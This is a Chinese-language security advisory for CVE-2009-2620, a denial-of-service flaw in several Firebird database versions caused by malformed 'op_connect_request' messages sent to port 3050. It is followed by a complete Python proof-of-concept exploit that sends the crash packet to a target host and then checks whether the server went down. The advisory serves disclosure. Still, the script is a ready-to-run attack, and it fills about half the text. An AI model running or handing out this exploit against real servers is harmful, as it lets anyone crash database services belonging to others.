Bugraq ID: 35842
CVE ID:CVE-2009-2620
Firebird是一款流行的数据库程序。
Firebird不正确处理包含非法数据的’op_connect_request’消息,远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
发送非法的数据长度超过或等于12字节的’op_connect_request’消息到默认的3050端口可触发此漏洞,导致应用服务程序崩溃,造成拒绝服务攻击。
Firebird Firebird 2.1.3 RC1
Firebird Firebird 2.1.2
Firebird Firebird 2.1.1
Firebird Firebird 2.0.5
Firebird Firebird 2.0.1
Firebird Firebird 1.5.5
Firebird Firebird 2.5 Beta 1
厂商解决方案
用户可参考Firebird CVS库获得更新程序:
http://www.firebirdsql.org/
import socket
import time
def attack(host, port):
op_connect_request = '\x35' # Request to establish connection
packet = '\x00\x00\x00' + op_connect_request
packet += "A" * 12 #Invalid data, must be >= 12 bytes in order to trigger the DoS
print "(+) Connecting to the server...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "(+) Sending op_connect_request packet..."
s.send(str(packet))
s.close()
print "(+) op_connect_request packet successfully sent."
#Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
print "(+) Waiting 10 seconds before trying to reconnect to the server..."
time.sleep(10)
try:
print "(+) Trying to reconnect..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.close()
print "(!) Something went wrong. The server is still alive."
except socket.error:
print "(*) Attack successful. The server is down."
port = 3050
host = '192.168.131.128' #Replace with your target host
attack(host, port)